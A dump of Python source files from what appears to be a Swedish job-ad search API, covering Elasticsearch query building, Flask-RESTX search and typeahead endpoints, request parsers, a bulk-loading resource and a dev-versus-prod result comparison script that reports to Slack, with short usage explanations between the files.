"bool": {
"filter": {"term": {f.WORKPLACE_ADDRESS_COUNTRY_CONCEPT_ID: {
"value": settings.SWEDEN_CONCEPT_ID}}},
"must_not": {"exists": {"field": f.WORKPLACE_ADDRESS_REGION_CONCEPT_ID}},
"boost": 1.0
}
},
]
if abroad:
plats_term_query += [
{
"bool": {
"must_not": {"term": {f.WORKPLACE_ADDRESS_COUNTRY_CONCEPT_ID: {
"value": settings.SWEDEN_CONCEPT_ID}}},
"boost": 1.0
}
},
]
plats_term_query += [{"term": {
f.WORKPLACE_ADDRESS_REGION_CODE: {
"value": lkod, "boost": 1.0}}} for lkod in lan]
plats_term_query += [{"term": {
f.WORKPLACE_ADDRESS_REGION_CONCEPT_ID: {
"value": lkod, "boost": 1.0}}} for lkod in lan]
plats_term_query += [{"term": {
f.WORKPLACE_ADDRESS_COUNTRY_CODE: {
"value": ckod, "boost": 1.0}}} for ckod in land]
plats_term_query += [{"term": {
f.WORKPLACE_ADDRESS_COUNTRY_CONCEPT_ID: {
"value": ckod, "boost": 1.0}}} for ckod in land]
plats_bool_query = {"bool": {
"should": plats_term_query}
} if plats_term_query else {}
neg_komm_term_query = []
neg_lan_term_query = []
neg_land_term_query = []
if neg_komm:
neg_komm_term_query = [{"term": {
f.WORKPLACE_ADDRESS_MUNICIPALITY_CODE: {
"value": kkod}}} for kkod in neg_komm]
neg_komm_term_query += [{"term": {
f.WORKPLACE_ADDRESS_MUNICIPALITY_CONCEPT_ID: {
"value": kkod}}} for kkod in neg_komm]
if neg_lan:
neg_lan_term_query = [{"term": {
f.WORKPLACE_ADDRESS_REGION_CODE: {
"value": lkod}}} for lkod in neg_lan]
neg_lan_term_query += [{"term": {
f.WORKPLACE_ADDRESS_REGION_CONCEPT_ID: {
"value": lkod}}} for lkod in neg_lan]
if neg_land:
neg_land_term_query = [{"term": {
f.WORKPLACE_ADDRESS_COUNTRY_CODE: {
"value": ckod}}} for ckod in neg_land]
neg_land_term_query += [{"term": {
f.WORKPLACE_ADDRESS_COUNTRY_CONCEPT_ID: {
"value": ckod}}} for ckod in neg_land]
if neg_komm_term_query or neg_lan_term_query or neg_land_term_query:
if 'bool' not in plats_bool_query:
plats_bool_query['bool'] = {}
plats_bool_query['bool'][
'must_not'] = neg_komm_term_query + neg_lan_term_query + neg_land_term_query
return plats_bool_query
@staticmethod
def _build_remote_plats_query(remote):
if remote is None:
"""
If parameter is not used, search results should not be affected,
check for None is included to make True/False code identical
"""
pass
else:
"""
Both True and False for remote are "must".
True: only ads with "remote_work" shall be included
False: No ads with "remote_work" shall be included
"""
remote_plats_query = {
"bool": {
"must": {"term": {"remote_work": remote}},
}
}
return remote_plats_query
# Parses PUBLISHED_AFTER and PUBLISHED_BEFORE
@staticmethod
def _filter_timeframe(from_datestring, to_datetime):
if not from_datestring and not to_datetime:
return None
range_query = {"range": {f.PUBLICATION_DATE: {}}}
from_datetime = None
if from_datestring and re.match(r'^\d+$', from_datestring):
now = datetime.now()
from_datetime = now - timedelta(minutes=int(from_datestring))
elif from_datestring:
# from_datetime = datetime.strptime(from_datestring, '%Y-%m-%dT%H:%M:%S')
from_datetime = parser.parse(from_datestring)
if from_datetime:
log.debug("Filter ads from %s" % from_datetime)
range_query['range'][f.PUBLICATION_DATE]['gte'] = from_datetime.isoformat()
if to_datetime:
range_query['range'][f.PUBLICATION_DATE]['lte'] = to_datetime.isoformat()
return range_query
# Parses PARTTIME_MIN and PARTTIME_MAX
@staticmethod
def _build_parttime_query(parttime_min, parttime_max):
if not parttime_min and not parttime_max:
return None
if not parttime_min:
parttime_min = 0.0
if not parttime_max:
parttime_max = 100.0
parttime_query = {
"bool": {
"must": [
{
"range": {
f.SCOPE_OF_WORK_MIN: {
"lte": parttime_max,
"gte": parttime_min
},
}
},
{
"range": {
f.SCOPE_OF_WORK_MAX: {
"lte": parttime_max,
"gte": parttime_min
}
}
}
]
}
}
return parttime_query
@staticmethod
def _build_generic_query(keys, itemlist):
items = [] if not itemlist else itemlist
term_query = []
neg_term_query = []
if isinstance(keys, str):
keys = [keys]
for key in keys:
term_query += [{"term": {key: {"value": item}}}
for item in items if not item.startswith('-')]
neg_term_query += [{"term": {key: {"value": item[1:]}}}
for item in items if item.startswith('-')]
if term_query or neg_term_query:
query = {'bool': {}}
if term_query:
query['bool']['should'] = term_query
if neg_term_query:
query['bool']['must_not'] = neg_term_query
return query
return None
# Parses POSITION and POSITION_RADIUS
@staticmethod
def _build_geo_dist_filter(positions, coordinate_ranges):
geo_bool = {"bool": {"should": []}} if positions else {}
for index, position in enumerate(positions or []):
latitude = None
longitude = None
coordinate_range = coordinate_ranges[index] \
if coordinate_ranges is not None and index < len(coordinate_ranges) \
else settings.DEFAULT_POSITION_RADIUS
if position and ',' in position:
try:
latitude = float(re.split(', ?', position)[0])
longitude = float(re.split(', ?', position)[1])
except ValueError as e:
log.info("Bad position-parameter: \"%s\" (%s)" % (position, str(e)))
geo_filter = {}
if not latitude or not longitude or not coordinate_range:
return {}
elif ((-90 <= latitude <= 90)
and (-180 <= longitude <= 180) and (coordinate_range > 0)):
geo_filter["geo_distance"] = {
"distance": str(coordinate_range) + "km",
                    # Note: the REST request takes latitude,longitude; the Elasticsearch geo array is [longitude, latitude]
f.WORKPLACE_ADDRESS_COORDINATES: [longitude, latitude]
}
if geo_filter:
geo_bool['bool']['should'].append(geo_filter)
return geo_bool
@staticmethod
def create_auto_complete_suggester(word):
""""
parse args and create auto complete suggester
"""
enriched_typeahead_field = f.KEYWORDS_ENRICHED_SYNONYMS
fields = ['compound', ]
search = elasticsearch_dsl.Search()
search = search.source('suggest')
for field in fields:
search = search.suggest(
'%s-suggest' % field,
word,
completion={
'field': '%s.%s.suggest' % (enriched_typeahead_field, field),
"skip_duplicates": True,
"size": 50,
"fuzzy": {
"min_length": 3,
"prefix_length": 0
}
}
)
return search.to_dict()
@staticmethod
def create_phrase_suggester(input_words):
""""
parse args and create phrase suggester
"""
enriched_typeahead_field = f.KEYWORDS_ENRICHED_SYNONYMS
field = '%s.compound' % enriched_typeahead_field
search = elasticsearch_dsl.Search()
search = search.source('suggest')
search = search.suggest(
'%s_simple_phrase' % field,
input_words,
phrase={
'field': '%s.trigram' % field,
'size': 10,
'max_errors': 2,
'direct_generator': [{
'field': '%s.trigram' % field,
'suggest_mode': 'always',
'min_word_length': 1
}, {
'field': '%s.reverse' % field,
'suggest_mode': 'always',
'pre_filter': 'reverse',
'post_filter': 'reverse',
'min_word_length': 1
}]
}
)
return search.to_dict()
@staticmethod
def create_suggest_search(suggest):
enriched_typeahead_field = f.KEYWORDS_ENRICHED_SYNONYMS
field = '%s.compound' % enriched_typeahead_field
search = defaultdict(dict)
query = search.setdefault('query', {})
match = query.setdefault('match', {})
field = match.setdefault(field, {})
field['query'] = suggest
field['operator'] = 'and'
return json.dumps(search)
@staticmethod
def create_check_search_word_type_query(word):
""""
Create check search word type query
"""
enriched_typeahead_field = f.KEYWORDS_ENRICHED_SYNONYMS
search = defaultdict(dict)
aggs = search.setdefault('aggs', {})
for field in ('location', 'skill', 'occupation'):
aggs['search_type_%s' % field] = {
'terms': {
'field': '%s.%s.raw' % (enriched_typeahead_field, field),
'include': word
}
}
return json.dumps(search)
@staticmethod
def create_suggest_extra_word_query(word, first_word_type, second_word_type):
""""
Create suggest extra word query
"""
enriched_typeahead_field = f.KEYWORDS_ENRICHED_SYNONYMS
search = defaultdict(dict)
aggs = search.setdefault('aggs', {})
first_word = aggs.setdefault('first_word', {})
first_word['filter'] = {
'term': {
'%s.%s.raw' % (enriched_typeahead_field, first_word_type): word,
}
}
first_word['aggs'] = {
'second_word': {
'terms': {
'field': '%s.%s.raw' % (enriched_typeahead_field, second_word_type),
'size': 6
}
}
}
return json.dumps(search)
def calculate_utc_offset():
is_dst = time.daylight and time.localtime().tm_isdst > 0
utc_offset = - (time.altzone if is_dst else time.timezone)
return int(utc_offset / 3600) if utc_offset > 0 else 0
```
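Most of `QueryBuilder` requires a live Elasticsearch-backed `TextToConcept`, but the static helpers are pure functions and can be exercised on their own. A small sketch; the field name and concept ids below are placeholders, only the shape of the output matters:
```python
from sokannonser.repository.querybuilder import QueryBuilder

print(QueryBuilder._rewrite_word_for_regex('c++'))
# -> c\+\+   (regex special characters are backslash-escaped)

print(QueryBuilder._build_generic_query(['some.field.keyword'], ['abc123', '-def456']))
# -> {'bool': {'should':   [{'term': {'some.field.keyword': {'value': 'abc123'}}}],
#              'must_not': [{'term': {'some.field.keyword': {'value': 'def456'}}}]}}
```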
#### File: rest/endpoint/platsannonser.py
```python
import logging
import time
from flask import request
from flask_restx import Resource
from jobtech.common.rest.decorators import check_api_key_and_return_metadata
from sokannonser import settings
from sokannonser.rest import ns_platsannons
from sokannonser.rest.model.queries import annons_complete_query, pb_query, load_ad_query
from sokannonser.rest.model.swagger import swagger_doc_params, swagger_filter_doc_params
from sokannonser.repository import platsannonser
from sokannonser.rest.model.result_models import (open_results, job_ad, typeahead_results)
from sokannonser.repository.querybuilder import QueryBuilder
import elasticapm
log = logging.getLogger(__name__)
@ns_platsannons.route('ad/<id>', endpoint='ad')
class Proxy(Resource):
method_decorators = [check_api_key_and_return_metadata('pb')]
@ns_platsannons.doc(
description='Load a job ad by ID',
)
@ns_platsannons.response(401, 'Invalid API-key')
@ns_platsannons.response(404, 'Job ad not found')
@ns_platsannons.expect(load_ad_query)
@ns_platsannons.marshal_with(job_ad)
def get(self, id, **kwargs):
elasticapm.set_user_context(username=kwargs.get('key_app'), user_id=kwargs.get('key_id'))
return platsannonser.fetch_platsannons(str(id))
@ns_platsannons.route('ad/<id>/logo', endpoint='ad_logo')
class AdLogo(Resource):
@ns_platsannons.doc(
description='Load a logo binary file by ID',
)
@ns_platsannons.response(404, 'Job ad not found')
def get(self, id):
return platsannonser.fetch_platsannons_logo(str(id))
@ns_platsannons.route('search')
class Search(Resource):
method_decorators = [check_api_key_and_return_metadata('pb')]
querybuilder = QueryBuilder()
@ns_platsannons.doc(
description='Search using parameters and/or freetext',
params={**swagger_doc_params, **swagger_filter_doc_params},
)
@ns_platsannons.response(401, 'Invalid API key')
@ns_platsannons.expect(pb_query)
@ns_platsannons.marshal_with(open_results)
def get(self, **kwargs):
elasticapm.set_user_context(username=kwargs.get('key_app'), user_id=kwargs.get('key_id'))
start_time = int(time.time()*1000)
args = pb_query.parse_args()
log.debug("Query parsed after: %d milliseconds." % (int(time.time()*1000)-start_time))
result = platsannonser.find_platsannonser(args,
self.querybuilder,
start_time,
request.headers.get('X-Fields'))
log.debug("Query results after %d milliseconds."
% (int(time.time()*1000)-start_time))
max_score = result.get('max_score', 1.0)
hits = [dict(hit['_source'],
**{'relevance': (hit['_score'] / max_score)
if max_score > 0 else 0.0})
for hit in result.get('hits', [])]
return self.marshal_results(result, hits, start_time)
@staticmethod
def marshal_results(esresult, hits, start_time):
total_results = {'value': esresult.get('total', {}).get('value')}
result_time = int(time.time()*1000) - start_time
result = {
"total": total_results,
"positions": esresult.get('positions', 0),
"query_time_in_millis": esresult.get('took', 0),
"result_time_in_millis": result_time,
"stats": esresult.get('stats', []),
"freetext_concepts": esresult.get('concepts', {}),
"hits": hits
}
log.debug(f"Sending results after: {result_time} milliseconds.")
return result
@ns_platsannons.route('complete')
class Complete(Resource):
method_decorators = [check_api_key_and_return_metadata('pb')]
querybuilder = QueryBuilder()
@ns_platsannons.doc(
description='Typeahead / Suggest next searchword',
params={
settings.CONTEXTUAL_TYPEAHEAD: "Set to false to disable contextual typeahead (default: true)",
**swagger_doc_params
}
)
@ns_platsannons.response(401, 'Invalid API-key')
@ns_platsannons.expect(annons_complete_query)
@ns_platsannons.marshal_with(typeahead_results)
def get(self, **kwargs):
elasticapm.set_user_context(username=kwargs.get('key_app'), user_id=kwargs.get('key_id'))
start_time = int(time.time()*1000)
args = annons_complete_query.parse_args()
freetext_query = args.get(settings.FREETEXT_QUERY) or ''
limit = args[settings.LIMIT] if args[settings.LIMIT] <= settings.MAX_COMPLETE_LIMIT else settings.MAX_COMPLETE_LIMIT
result = {}
        # No result yet, or the suggester did not return exactly one suggestion
if not result or len(result.get('aggs')) != 1:
args[settings.TYPEAHEAD_QUERY] = freetext_query
args[settings.FREETEXT_QUERY] = ' '.join(freetext_query.split(' ')[0:-1])
result = platsannonser.suggest(args, self.querybuilder)
            # Exactly one suggestion returned; try to suggest an extra word
if len(result.get('aggs')) == 1:
extra_words = platsannonser.suggest_extra_word(args, result.get('aggs')[0]['value'].strip(), self.querybuilder) #TODO "args not used"
result['aggs'] += extra_words
log.debug('Extra words: %s' % result['aggs'])
        # If the query ends with a space, remove suggestions identical to the first input word
        if not freetext_query.split(' ')[-1]:
            result['aggs'] = platsannonser.find_agg_and_delete(freetext_query.strip().split(' ')[0], result['aggs'])
            log.debug('Empty last typeahead word. Aggs after removal: %s' % result['aggs'])
log.debug("Typeahead query results after: %d milliseconds." % (int(time.time()*1000)-start_time))
return self.marshal_results(result, limit, start_time)
@staticmethod
def marshal_results(esresult, limit, start_time):
typeahead_result = esresult.get('aggs', [])
if len(typeahead_result) > limit:
typeahead_result = typeahead_result[:limit]
result = {
"time_in_millis": esresult.get('took', 0),
"typeahead": typeahead_result,
}
log.debug("Typeahead sending results after: %d milliseconds." % (int(time.time()*1000) - start_time))
return result
```
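From a client's perspective, `Search.get` parses the query parameters, runs the Elasticsearch query and attaches a `relevance` value of `_score / max_score` to every hit. A hedged client sketch with `requests`; the base URL is an assumption (substitute your deployment's host), while the `api-key` header, `q` and `sort` parameters match the ones used in `task/freetext_compare.py` below:
```python
import requests

BASE_URL = 'https://<your-jobsearch-host>/search'  # assumed mount point of the 'search' route

resp = requests.get(BASE_URL,
                    headers={'api-key': '<your API key>'},
                    params={'q': 'systemutvecklare stockholm', 'sort': 'pubdate-desc'})
resp.raise_for_status()
for hit in resp.json().get('hits', []):
    # 'relevance' is computed server-side in Search.get() as _score / max_score
    print(round(hit.get('relevance', 0.0), 3), hit.get('headline'))
```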
#### File: rest/model/queries.py
```python
from flask_restx import reqparse, inputs
from datetime import datetime
from sokannonser import settings
from sokannonser.repository import taxonomy
from sokannonser.rest.model import fields
# Query models
QF_CHOICES = ['occupation', 'skill', 'location', 'employer']
VF_TYPE_CHOICES = [taxonomy.OCCUPATION, taxonomy.GROUP, taxonomy.FIELD, taxonomy.SKILL,
taxonomy.MUNICIPALITY, taxonomy.REGION, taxonomy.COUNTRY,
taxonomy.PLACE, taxonomy.WAGE_TYPE, taxonomy.WORKTIME_EXTENT,
taxonomy.DRIVING_LICENCE, taxonomy.EMPLOYMENT_TYPE, taxonomy.LANGUAGE]
OPTIONS_BRIEF = 'brief'
OPTIONS_FULL = 'full'
def lowercase_maxlength(value):
if value is None:
raise ValueError('string type must be non-null')
if len(value) > 255:
raise ValueError('parameter can not be longer than 255 characters')
return str(value).lower()
load_ad_query = reqparse.RequestParser()
load_ad_query.add_argument(settings.APIKEY, location='headers', required=True)
base_annons_query = reqparse.RequestParser()
base_annons_query.add_argument(settings.APIKEY, location='headers', required=True)
base_annons_query.add_argument(settings.X_FEATURE_FREETEXT_BOOL_METHOD, choices=['and', 'or'],
default=settings.DEFAULT_FREETEXT_BOOL_METHOD, location='headers', required=False)
base_annons_query.add_argument(settings.X_FEATURE_DISABLE_SMART_FREETEXT, type=inputs.boolean,
location='headers', required=False),
base_annons_query.add_argument(settings.X_FEATURE_ENABLE_FALSE_NEGATIVE, type=inputs.boolean,
location='headers', required=False),
base_annons_query.add_argument(settings.PUBLISHED_BEFORE, type=lambda x: datetime.strptime(x, '%Y-%m-%dT%H:%M:%S'))
# annons_complete_query.add_argument(settings.PUBLISHED_AFTER,
# type=lambda x: datetime.strptime(x,
# '%Y-%m-%dT%H:%M:%S'))
datetime_or_minutes_regex = r'^(\d\d\d\d-(0?[1-9]|1[0-2])-(0?[1-9]|[12][0-9]|3[01])T(0[0-9]|1[0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9]))|(\d+)$'
base_annons_query.add_argument(settings.PUBLISHED_AFTER,
type=inputs.regex(datetime_or_minutes_regex))
base_annons_query.add_argument(taxonomy.OCCUPATION, action='append')
base_annons_query.add_argument(taxonomy.GROUP, action='append')
base_annons_query.add_argument(taxonomy.FIELD, action='append')
base_annons_query.add_argument(taxonomy.COLLECTION, action='append')
base_annons_query.add_argument(taxonomy.SKILL, action='append')
base_annons_query.add_argument(taxonomy.LANGUAGE, action='append')
base_annons_query.add_argument(taxonomy.WORKTIME_EXTENT, action='append')
base_annons_query.add_argument(settings.PARTTIME_MIN, type=float)
base_annons_query.add_argument(settings.PARTTIME_MAX, type=float)
base_annons_query.add_argument(taxonomy.DRIVING_LICENCE_REQUIRED, type=inputs.boolean)
base_annons_query.add_argument(taxonomy.DRIVING_LICENCE, action='append')
base_annons_query.add_argument(taxonomy.EMPLOYMENT_TYPE, action='append')
base_annons_query.add_argument(settings.EXPERIENCE_REQUIRED, type=inputs.boolean)
base_annons_query.add_argument(taxonomy.MUNICIPALITY, action='append')
base_annons_query.add_argument(taxonomy.REGION, action='append')
base_annons_query.add_argument(taxonomy.COUNTRY, action='append')
base_annons_query.add_argument(settings.UNSPECIFIED_SWEDEN_WORKPLACE, type=inputs.boolean)
base_annons_query.add_argument(settings.ABROAD, type=inputs.boolean)
base_annons_query.add_argument(settings.REMOTE, type=inputs.boolean)
# Matches(lat,long) +90.0,-127.554334; 45,180; -90,-180; -90.000,-180.0000; +90,+180
# r for raw, PEP8
position_regex = r'^[-+]?([1-8]?\d(\.\d*)?|90(\.0*)?),' \
r'[-+]?(180(\.0*)?|((1[0-7]\d)|([1-9]?\d))(\.\d*)?)$'
base_annons_query.add_argument(settings.POSITION, type=inputs.regex(position_regex), action='append')
base_annons_query.add_argument(settings.POSITION_RADIUS, type=int, action='append')
base_annons_query.add_argument(settings.EMPLOYER, action='append')
base_annons_query.add_argument(settings.FREETEXT_QUERY, type=lowercase_maxlength)
base_annons_query.add_argument(settings.FREETEXT_FIELDS, action='append', choices=QF_CHOICES)
annons_complete_query = base_annons_query.copy()
annons_complete_query.add_argument(settings.LIMIT, type=inputs.int_range(0, settings.MAX_COMPLETE_LIMIT), default=10)
annons_complete_query.add_argument(settings.CONTEXTUAL_TYPEAHEAD, type=inputs.boolean, default=True)
pb_query = base_annons_query.copy()
pb_query.add_argument(settings.MIN_RELEVANCE, type=float),
pb_query.add_argument(settings.DETAILS, choices=[OPTIONS_FULL, OPTIONS_BRIEF])
pb_query.add_argument(settings.OFFSET, type=inputs.int_range(0, settings.MAX_OFFSET), default=0)
pb_query.add_argument(settings.LIMIT, type=inputs.int_range(0, settings.MAX_LIMIT), default=10)
# TODO: Remove sort_option 'id' in next major version
pb_query.add_argument(settings.SORT, choices=list(fields.sort_options.keys()) + ['id'])
pb_query.add_argument(settings.STATISTICS, action='append',
choices=[taxonomy.OCCUPATION, taxonomy.GROUP,
taxonomy.FIELD, taxonomy.COUNTRY,
taxonomy.MUNICIPALITY, taxonomy.REGION])
pb_query.add_argument(settings.STAT_LMT, type=inputs.int_range(0, 30), required=False)
taxonomy_query = reqparse.RequestParser()
taxonomy_query.add_argument(settings.APIKEY, location='headers', required=True)
taxonomy_query.add_argument(settings.OFFSET, type=inputs.int_range(0, settings.MAX_OFFSET), default=0)
taxonomy_query.add_argument(settings.LIMIT, type=inputs.int_range(0, settings.MAX_TAXONOMY_LIMIT), default=10)
taxonomy_query.add_argument(settings.FREETEXT_QUERY)
taxonomy_query.add_argument('type', action='append', choices=VF_TYPE_CHOICES),
taxonomy_query.add_argument(settings.SHOW_COUNT, type=inputs.boolean, default=False)
taxonomy_query.add_argument('parent-id', action='append')
```
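The parsers above only resolve arguments inside a request context. A minimal sketch, assuming a throwaway Flask app purely for that context and using the settings/taxonomy constants as parameter names so nothing is hard-coded:
```python
from flask import Flask

from sokannonser import settings
from sokannonser.repository import taxonomy
from sokannonser.rest.model.queries import base_annons_query

app = Flask(__name__)

with app.test_request_context(
        '/search',
        query_string={taxonomy.REGION: '01', settings.PARTTIME_MIN: '50'},
        headers={settings.APIKEY: 'test-key'}):
    args = base_annons_query.parse_args()
    # action='append' parameters come back as lists, type=float as floats,
    # and the required api-key header must be present or parse_args() aborts with 400.
    print(args[taxonomy.REGION], args[settings.PARTTIME_MIN])  # ['01'] 50.0
```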
#### File: castaway/task/freetext_compare.py
```python
import requests
import os
import time
from task.slack_tool import SlackMessage, SlackAttachment
from sokannonser import settings
# channel could be dev, stage, prod
url = {
'dev': settings.URL_DEV + 'search',
'stage': settings.URL_STAGE + 'search',
'prod': settings.URL_PROD + 'search',
}
def run_test_cases(file_name, channel1, channel2):
this_folder = os.path.dirname(os.path.abspath(__file__))
my_file = os.path.join(this_folder, 'test_cases/' + file_name)
freetext_hits_result = list()
freetext_first_hit_result = list()
freetext_first_ten_hits_result = list()
    different_count = 0
    sum_count = 0
    with open(my_file, 'r') as file:
        for line in file.readlines():
            q = line.rstrip("\n")
            channel1_result = get_search_result(q, url[channel1])
            channel2_result = get_search_result(q, url[channel2])
            sum_count += 1
            # compare total hit counts between the two environments
freetext_hits = check_freetext_hits(channel1_result, channel2_result)
if freetext_hits:
freetext_hits_result.append(freetext_hits+[q, channel1, channel2])
different_count += 1
            # compare whether the first hit differs between the two environments
freetext_first_hit = check_freetext_first_hits(channel1_result, channel2_result)
if freetext_first_hit:
freetext_first_hit_result.append(freetext_first_hit+[q, channel1, channel2])
            # compare whether the first ten hits (and their order) are identical
freetext_first_ten_hits = check_freetext_first_ten_hits(channel1_result, channel2_result)
if freetext_first_ten_hits:
freetext_first_ten_hits_result.append(freetext_first_ten_hits+[q, channel1, channel2])
# send slack message
send_freetext_hits_result_slack_message(freetext_hits_result)
send_freetext_hit_result_utility_slack_message(different_count, sum_count)
send_freetext_first_hit_result_slack_message(freetext_first_hit_result)
send_freetext_first_ten_hits_result_slack_message(freetext_first_ten_hits_result)
def get_search_result(q, env):
headers = {'api-key': settings.APIKEY, }
params = {'q': q, 'sort': 'pubdate-desc'}
responses = requests.get(url=env, params=params, headers=headers)
response_json = responses.json()
return response_json
color = {
'red': SlackAttachment.DANGER,
'yellow': SlackAttachment.WARNING,
'green': SlackAttachment.GOOD
}
def check_color(different, hits):
if abs(different) / hits > 0.25:
return color['red']
elif abs(different) / hits > 0.01:
return color['yellow']
return color['green']
def check_freetext_hits(channel1_result, channel2_result):
channel1_hits = channel1_result.get('total').get('value')
channel2_hits = channel2_result.get('total').get('value')
difference = channel1_hits - channel2_hits
if difference:
median = (channel1_hits + channel2_hits) / 2
colour = check_color(difference, median)
return [colour, channel1_hits, channel2_hits, difference]
return difference
def check_freetext_first_hits(channel1_result, channel2_result):
channel1_hits = channel1_result.get('hits')
channel2_hits = channel2_result.get('hits')
channel1_hits_first = channel1_hits[0].get('id', 0) if channel1_hits else 'None'
channel2_hits_first = channel2_hits[0].get('id', 0) if channel2_hits else 'None'
different = 0
if channel1_hits_first != channel2_hits_first:
different = [channel1_hits_first, channel2_hits_first]
return different
def check_freetext_first_ten_hits(channel1_result, channel2_result):
channel1_hits = channel1_result.get('hits')
channel2_hits = channel2_result.get('hits')
if len(channel1_hits) >= 10:
channel1_first_ten = [hit['id'] for hit in channel1_hits[:10]]
else:
channel1_first_ten = [hit['id'] for hit in channel1_hits]
if len(channel2_hits) >= 10:
channel2_first_ten = [hit['id'] for hit in channel2_hits[:10]]
else:
channel2_first_ten = [hit['id'] for hit in channel2_hits]
different = 0
if len(channel1_first_ten) != len(channel2_first_ten):
different = [channel1_first_ten, channel2_first_ten]
else:
for i in range(len(channel1_first_ten)):
if channel1_first_ten[i] != channel2_first_ten[i]:
different = [channel1_first_ten, channel2_first_ten]
break
return different
def send_freetext_hits_result_slack_message(result):
result = sorted(result, key=lambda item: item[3], reverse=True)
SlackMessage(channel=settings.TEST_RESULT_CHANNEL,
attachments=[SlackAttachment(title="Freetext hits difference",)]).send()
for colour, channel1_hits, channel2_hits, difference, q, channel1, channel2 in result:
SlackMessage(
channel=settings.TEST_RESULT_CHANNEL,
attachments=[
SlackAttachment(
color=colour,
text="{q}: {ch1_h} {ch1} hits & {ch2_h} {ch2} hits: {diff} diff".format(
q=q,
ch1_h=channel1_hits,
ch1=channel1,
ch2_h=channel2_hits,
ch2=channel2,
diff=difference
))
]
).send()
time.sleep(0.5)
def send_freetext_hit_result_utility_slack_message(difference, all_count):
SlackMessage(channel=settings.TEST_RESULT_CHANNEL,
attachments=[SlackAttachment(
title="Freetext hits difference: {diff}, utility: {utility}%".format(
diff=difference,
utility=round(difference/all_count*100, 2)
),
)]).send()
def send_freetext_first_hit_result_slack_message(result):
SlackMessage(channel=settings.TEST_RESULT_CHANNEL,
attachments=[SlackAttachment(
title="Freetext first hit difference",
)]).send()
for channel1_first_hit, channel2_first_hit, q, channel1, channel2 in result:
SlackMessage(
channel=settings.TEST_RESULT_CHANNEL,
attachments=[
SlackAttachment(
color=color['red'],
text="{q} first hit: {ch1_hit} {ch1} & {ch2_hit} {ch2}".format(
q=q,
ch1_hit=channel1_first_hit,
ch1=channel1,
ch2_hit=channel2_first_hit,
ch2=channel2
))
]
).send()
time.sleep(0.5)
def send_freetext_first_ten_hits_result_slack_message(result):
SlackMessage(channel=settings.TEST_RESULT_CHANNEL,
attachments=[SlackAttachment(
title="Freetext first ten hits difference",
)]).send()
for channel1_first_ten_hit, channel2_first_ten_hit, q, channel1, channel2 in result:
SlackMessage(
channel=settings.TEST_RESULT_CHANNEL,
attachments=[
SlackAttachment(
color=color['red'],
text="{q} first 10 hits rank diff: {ch1_hit} {ch1} & {ch2_hit} {ch2}".format(
q=q,
ch1_hit=str(channel1_first_ten_hit),
ch1=channel1,
ch2_hit=str(channel2_first_ten_hit),
ch2=channel2
))
]
).send()
time.sleep(0.5)
run_test_cases('q_text_cases.txt', 'dev', 'prod')
```
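The `check_color` thresholds decide how loudly a difference is reported: more than 25 % of the averaged hit count is red, more than 1 % is yellow, anything smaller is green. A quick worked example (note that importing the module itself triggers `run_test_cases` at the bottom, so this is easiest to try with `check_color` and the `color` map lifted out):
```python
print(check_color(30, 100))    # abs(30)/100  = 0.30  > 0.25 -> 'danger'  (red)
print(check_color(-5, 100))    # abs(-5)/100  = 0.05  > 0.01 -> 'warning' (yellow)
print(check_color(1, 1000))    # abs(1)/1000  = 0.001        -> 'good'    (green)
```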
#### File: task/rest/bulk.py
```python
import logging
import time
from datetime import datetime, timedelta
from flask import send_file, Response
from flask_restx import Resource
from jobtech.common.rest.decorators import check_api_key_and_return_metadata
from bulkloader.rest import ns_bulk, bulk_zip_query, bulk_stream_query
from bulkloader import repository
from sokannonser import settings
import elasticapm
log = logging.getLogger(__name__)
# @ns_bulk.route('zip')
class BulkZip(Resource):
method_decorators = [check_api_key_and_return_metadata('bulk', 300)]
@ns_bulk.doc(
params={
settings.DATE: "Date to zip ads for. Accepts date as YYYY-MM-DD or 'all'. "
"(Note that 'all' can take a couple of minutes to compile.)"
" Rate limit is one request every five minutes."
},
responses={
200: 'OK',
401: 'Invalid API-key',
429: 'Rate limit exceeded',
500: 'Technical error'
}
)
@ns_bulk.expect(bulk_zip_query)
def get(self, **kwargs):
elasticapm.set_user_context(username=kwargs['key_app'], user_id=kwargs['key_id'])
start_time = int(time.time()*1000)
args = bulk_zip_query.parse_args()
bytes_result = repository.zip_ads(args.get(settings.DATE), start_time)
filename = "ads_%s.zip" % args.get(settings.DATE)
log.debug("Elapsed time for completion: %d" % int((time.time()*1000)-start_time))
return send_file(bytes_result,
attachment_filename=filename, cache_timeout=60,
as_attachment=True)
@ns_bulk.route('tests')
class BulkLoad(Resource):
method_decorators = [check_api_key_and_return_metadata('bulk', 60)]
example_date = (datetime.now() - timedelta(minutes=10)).strftime("%Y-%m-%dT%H:%M:%S")
@ns_bulk.doc(
params={
settings.DATE: "Stream ads updated since datetime. "
"Accepts datetime as YYYY-MM-DDTHH:MM:SS, "
"for example %s. Rate limit is one request per minute." % example_date
},
responses={
200: 'OK',
401: 'Invalid API-key',
429: 'Rate limit exceeded',
500: 'Technical error'
}
)
@ns_bulk.expect(bulk_stream_query)
def get(self, **kwargs):
elasticapm.set_user_context(username=kwargs.get('key_app'), user_id=kwargs.get('key_id'))
args = bulk_stream_query.parse_args()
        return Response(repository.load_all(args),
mimetype='application/json')
```
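The two resources above only parse the query arguments and delegate to `repository.zip_ads` and `repository.load_all`. A minimal client sketch for the streaming resource follows; the base URL/route constant is a placeholder (the actual path depends on how `ns_bulk` is mounted), while the `api-key` header name and the `date` parameter match what the API tests later in this repository use.

```python
# Hypothetical client for the streaming resource defined above.
# STREAM_URL is an assumption for illustration only.
import requests

STREAM_URL = "http://localhost:5000/bulk/tests"  # placeholder base URL + route


def fetch_ads_updated_since(date_str: str, api_key: str) -> list:
    """Fetch ads updated since date_str (YYYY-MM-DDTHH:MM:SS) as parsed JSON."""
    response = requests.get(
        STREAM_URL,
        headers={"api-key": api_key},   # header name used by the API tests in this repo
        params={"date": date_str},      # parameter documented in the resource above
    )
    response.raise_for_status()
    return response.json()
```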
#### File: castaway/task/slack_tool.py
```python
from datetime import datetime
from typing import Optional, Dict, List, Any
from sokannonser import settings
from django.template.loader import render_to_string
from django.utils.encoding import force_text
import slack
from slack import errors
if settings.SLACK_STORE_MESSAGE:
def retrieve_outbox_slack_messages():
# Returns locally stored messages during tests
if 'outbox' not in globals():
return []
global outbox # noqa
return outbox
def clear_slack_messages():
if 'outbox' in globals():
global outbox
outbox = []
def get_channel_id(channel_name: str) -> str:
client = slack.WebClient(token=settings.SLACK_TOKEN)
slack_response = client.channels_list() # Let exceptions propagate. There's nothing we can do here.
if slack_response['ok'] is False:
raise errors.SlackClientError # Something's wrong with either the token or user permissions
try:
